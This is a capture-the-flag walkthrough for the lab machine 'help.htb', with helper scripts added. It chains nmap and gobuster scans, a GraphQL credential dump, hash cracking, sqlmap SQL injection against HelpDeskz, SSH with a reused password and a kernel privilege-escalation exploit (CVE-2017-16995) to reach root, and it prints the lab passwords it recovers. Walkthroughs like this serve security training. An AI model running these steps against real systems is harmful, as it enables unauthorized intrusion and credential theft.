nmap -p- --min-rate 10000 10.10.10.121 -Pn

After identifying the open ports, run a more detailed nmap scan against just those ports (-A already implies -sC and -sV, so the extra flags are harmless but redundant).

nmap -A -sC -sV -p22,80,3000 10.10.10.121

The nmap output reveals the hostname help.htb, so add it to /etc/hosts so the web services can be reached by name.

First, look at port 3000 to see what is running there.

It looks like an API, so enumerate it with an API-specific wordlist to find possible endpoints.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -t 40 -u http://help.htb:3000/

The /graphql endpoint shows this is a GraphQL API. Rather than hunting for documentation, ask the API to describe itself: GraphQL's introspection feature exposes the schema (query root, types and their fields) through the reserved __schema and __type fields, and it is enabled here.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq  -c .

The query root exposes a User type; list its fields.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .

Now fetch the values of those fields.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .

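The three curl commands above are one repeatable procedure: list the query root's fields, introspect a type, then select its fields. The script below, an added example for this writeup and not code from the original README, automates that with only the standard library. The endpoint URL is the one found above; the sample responses at the bottom are constructed in the shape the target returned (placeholder values, not the real ones) so the parsing can be exercised offline, and it goes slightly beyond the page by reading each field's type so scalar fields can be separated from nested object types.

```python
import json
import re
import urllib.request

GRAPHQL_URL = "http://help.htb:3000/graphql"  # the endpoint found above

# The same introspection query the first curl command sends.
ROOT_FIELDS_QUERY = "{ __schema { queryType { name fields { name description } } } }"

# Built-in scalars; anything else named by __type is an object type.
# Custom scalars would be missed (assumption for this writeup).
SCALARS = {"String", "Int", "Float", "Boolean", "ID"}

_NAME_RE = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")


def type_fields_query(type_name: str) -> str:
    """Introspection query for one type, as in the second curl command, plus
    each field's (possibly wrapped) type so scalars can be told from objects."""
    if not _NAME_RE.fullmatch(type_name):
        raise ValueError(f"not a GraphQL name: {type_name!r}")
    return ('{ __type(name: "%s") { name fields { name '
            'type { name kind ofType { name kind ofType { name kind } } } } } }'
            % type_name)


def selection_query(root_field: str, fields) -> str:
    """Data query like the third curl command:
    ('user', ['username', 'password']) -> '{ user { username password } }'."""
    for name in [root_field, *fields]:
        if not _NAME_RE.fullmatch(name):
            raise ValueError(f"not a GraphQL name: {name!r}")
    return "{ %s { %s } }" % (root_field, " ".join(fields))


def post_graphql(query: str, url: str = GRAPHQL_URL, timeout: float = 10.0) -> dict:
    """POST {"query": ...} as JSON, exactly what the curl -d above does."""
    req = urllib.request.Request(
        url, data=json.dumps({"query": query}).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def root_fields(schema_response: dict) -> dict:
    """{root field name: description} from a __schema response."""
    query_type = schema_response["data"]["__schema"]["queryType"]
    return {f["name"]: f.get("description") for f in query_type["fields"]}


def named_type(t):
    """Strip NON_NULL / LIST wrappers (which have name null) down to the named type."""
    while t is not None and t.get("name") is None:
        t = t.get("ofType")
    return None if t is None else t["name"]


def type_fields(type_response: dict) -> dict:
    """{field name: named type} from a __type response."""
    fields = type_response["data"]["__type"]["fields"] or []
    return {f["name"]: named_type(f["type"]) for f in fields}


def scalar_fields(fields: dict) -> list:
    """Fields that can be selected directly, without a nested selection set."""
    return [name for name, tname in fields.items() if tname in SCALARS]


def dump_root_field(root_field: str, type_name: str, url: str = GRAPHQL_URL) -> dict:
    """Live version of the curl steps: introspect the type, then select all
    of its scalar fields under the given root field."""
    fields = type_fields(post_graphql(type_fields_query(type_name), url))
    return post_graphql(selection_query(root_field, scalar_fields(fields)), url)


# Constructed sample responses in the shape the target returned (placeholder
# values, not the real ones from the box).
SAMPLE_SCHEMA = {"data": {"__schema": {"queryType": {"name": "Query", "fields": [
    {"name": "user", "description": None}]}}}}
SAMPLE_USER_TYPE = {"data": {"__type": {"name": "User", "fields": [
    {"name": "username", "type": {"name": None, "kind": "NON_NULL",
                                  "ofType": {"name": "String", "kind": "SCALAR", "ofType": None}}},
    {"name": "password", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
    {"name": "tickets", "type": {"name": None, "kind": "LIST",
                                 "ofType": {"name": "Ticket", "kind": "OBJECT", "ofType": None}}},
]}}}

if __name__ == "__main__":
    print(root_fields(SAMPLE_SCHEMA))
    print(selection_query("user", scalar_fields(type_fields(SAMPLE_USER_TYPE))))
    # Against the live box: print(dump_root_field("user", "User"))
```

The name check matters because the type name is interpolated into the query string; without it a crafted name could alter the query. Object-typed fields such as `tickets` are left out of the generated selection because GraphQL requires a nested selection set for them; feed their type name back into `type_fields_query` to walk one level deeper.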

Crack the recovered password hash with CrackStation. CrackStation is a lookup against precomputed tables, so it only succeeds when the hash is unsalted; it resolves this one, which means no salt was mixed in.

helpme@helpme.com: godhelpmeplz
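To make the salt point concrete, here is an offline version of what a lookup site does, added as an example for this writeup rather than taken from the original README. The wordlist is constructed; the digest algorithm is guessed from the hex length the way CrackStation does, and the `salt` parameter shows that the same candidate list stops matching as soon as a salt is involved unless the salt is known too.

```python
import hashlib

# Constructed candidate list standing in for a wordlist / precomputed table.
WORDLIST = ["password", "123456", "helpdesk", "godhelpmeplz", "Welcome1"]

# First thing a lookup site does: guess the digest from the hex length.
ALGO_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def identify(hash_hex: str):
    """Return the probable digest name for a hex string, or None."""
    h = hash_hex.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return ALGO_BY_HEX_LEN.get(len(h))


def digest(algo: str, text: str) -> str:
    return hashlib.new(algo, text.encode()).hexdigest()


def crack(hash_hex: str, wordlist=WORDLIST, salt: str = "", salt_prefix: bool = True):
    """Return the candidate whose (optionally salted) digest matches, else None.

    salt="" reproduces an unsalted table lookup. With a salt the lookup fails
    on the same wordlist unless the salt (and its position) is supplied."""
    algo = identify(hash_hex)
    if algo is None:
        raise ValueError("unrecognised hash format")
    target = hash_hex.strip().lower()
    for word in wordlist:
        data = (salt + word) if salt_prefix else (word + salt)
        if digest(algo, data) == target:
            return word
    return None


if __name__ == "__main__":
    unsalted = digest("md5", "godhelpmeplz")
    print(identify(unsalted), crack(unsalted))            # md5 godhelpmeplz
    salted = digest("md5", "x7q2" + "godhelpmeplz")
    print(crack(salted), crack(salted, salt="x7q2"))      # None godhelpmeplz
```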

Next, enumerate directories on port 80 to find anything interesting there.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -u http://help.htb/

Gobuster finds a web application under the /support path.

Log in to it with the credentials recovered from the GraphQL API.

The application is HelpDeskz; search for publicly known exploits for this version.

Use the authenticated SQL injection in the ticket attachment feature (the attachment branch of view_tickets, reached through the param[] values in the URL below).

Let sqlmap exploit it (the parameter name is quoted so the shell does not treat the brackets as a glob):

sqlmap -u "http://help.htb/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6" --level 5 --risk 3 -p "param[]"

Dumping the staff table of the support database (sqlmap's -D, -T and --dump options) yields a credential:

help: Welcome1

The same password is reused for the help user's SSH account on the target machine (ssh help@help.htb).

user.txt

Running uname -a to check the kernel version shows a kernel affected by CVE-2017-16995, a bug in the eBPF verifier (incorrect sign extension of 32-bit immediates in check_alu_op) that lets an unprivileged user who can call bpf() gain arbitrary kernel memory read/write and escalate to root.

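Before running a kernel exploit on a box it is worth confirming the two preconditions, since a failed attempt can crash the host. The pre-flight check below is an added example, not code from the original README or from the exploit. The threshold 4.4.0-116 is taken from the exploit-db 44298 entry's own description of the Ubuntu 16.04 kernels it targets (an assumption to be checked against the downloaded file), and the sysctl check reflects that the exploit needs unprivileged bpf() to be allowed (kernel.unprivileged_bpf_disabled = 0).

```python
import os
import re

# From the exploit-db 44298 description: Ubuntu 16.04 kernels below this
# build are affected. Assumption taken from the exploit's own header.
FIXED_KERNEL = "4.4.0-116"

BPF_SYSCTL = "/proc/sys/kernel/unprivileged_bpf_disabled"

_UNAME_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)")


def parse_ubuntu_kernel(uname_r: str):
    """'4.4.0-116-generic' -> ((4, 4, 0), 116); None if not Ubuntu-style."""
    m = _UNAME_RE.match(uname_r.strip())
    if not m:
        return None
    a, b, c, abi = map(int, m.groups())
    return (a, b, c), abi


def kernel_looks_vulnerable(uname_r: str, fixed: str = FIXED_KERNEL) -> bool:
    """True when uname_r is in the same upstream series as `fixed` and has a
    lower Ubuntu ABI number. A different series is reported as False because
    this comparison says nothing about it, not because it is safe."""
    cur, fix = parse_ubuntu_kernel(uname_r), parse_ubuntu_kernel(fixed)
    if cur is None or fix is None or cur[0] != fix[0]:
        return False
    return cur[1] < fix[1]


def unprivileged_bpf_allowed(sysctl_value: str) -> bool:
    """kernel.unprivileged_bpf_disabled: 0 means unprivileged bpf() is allowed
    (what the exploit needs to load its eBPF program); any non-zero value blocks it."""
    return sysctl_value.strip() == "0"


def preflight(uname_r: str, sysctl_value: str) -> dict:
    """Combine both checks into one verdict."""
    kernel_ok = kernel_looks_vulnerable(uname_r)
    bpf_ok = unprivileged_bpf_allowed(sysctl_value)
    return {"kernel": kernel_ok, "bpf": bpf_ok, "go": kernel_ok and bpf_ok}


def preflight_live() -> dict:
    """Run the checks on the current host (the target, after SSHing in)."""
    try:
        with open(BPF_SYSCTL) as f:
            sysctl_value = f.read()
    except OSError:
        sysctl_value = "missing"   # very old kernels lack the knob; treat as unknown
    return preflight(os.uname().release, sysctl_value)


if __name__ == "__main__":
    print(preflight_live())
```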

Upload the exploit source (exploit-db entry 44298) to the machine, then compile and run it there. Use scp for the upload:

scp 44298.c help@help.htb:/tmp

Compile the exploit on the target (so it is built against the target's own toolchain and libc) and run it:

gcc -o exploit 44298.c
./exploit

root.txt
